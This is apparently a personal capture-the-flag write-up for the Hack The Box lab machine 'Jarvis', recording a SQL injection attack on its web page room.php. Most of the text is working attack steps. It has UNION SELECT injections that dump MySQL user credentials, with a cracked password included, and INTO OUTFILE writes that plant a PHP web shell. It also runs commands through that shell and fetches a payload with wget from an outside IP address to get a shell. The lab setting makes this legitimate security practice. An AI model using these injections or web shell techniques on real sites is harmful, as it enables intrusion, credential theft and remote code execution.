4 :80 sqli
http://jarvis.htb/room.php?cod=1
cod=1'
# page loads, but no data of room type
# used ' UNION SELECT 1-7 -- ; nothing working
# removing quote and checking
http://jarvis.htb/room.php?cod=1 UNION SELECT 1,2,3,4,5,6,7 -- -
# works query is executing but results showing same as cod=1
# using a cod= page that does not load existing data from db
http://jarvis.htb/room.php?cod=7 UNION SELECT 1,2,3,4,5,6,7 -- -
page returned contains 2,3,4,5
# all those fields are injectable
version()
10.1.37-MariaDB-0+deb9u1
select user, password from mysql.user limit 0,1
DBadmin
2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
# cracked: imissyou
# can login to phpMyAdmin now.
select schema_name from information_schema.schemata limit [0-3],1
hotel
information_schema
mysql
performance_schema
# before we proceed trying to get shell directly
jarvis.htb/room.php?cod=7 UNION all SELECT 1,2,'kashz',4,5,6,7 INTO OUTFILE '/var/www/html/kashz.txt' -- -
# works
http://jarvis.htb/kashz.txt
1 2 kashz 4 5 6 7
jarvis.htb/room.php?cod=7 UNION all SELECT 1,2,"<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; ?>",4,5,6,7 INTO OUTFILE '/var/www/html/k.php' -- -
http://jarvis.htb/k.php?cmd=whoami;id;hostname;uname -a
1 2
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
jarvis
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
4 5 6 7
# can get shell using
http://jarvis.htb/k.php?cmd=wget 10.10.16.5/web.php
Last updated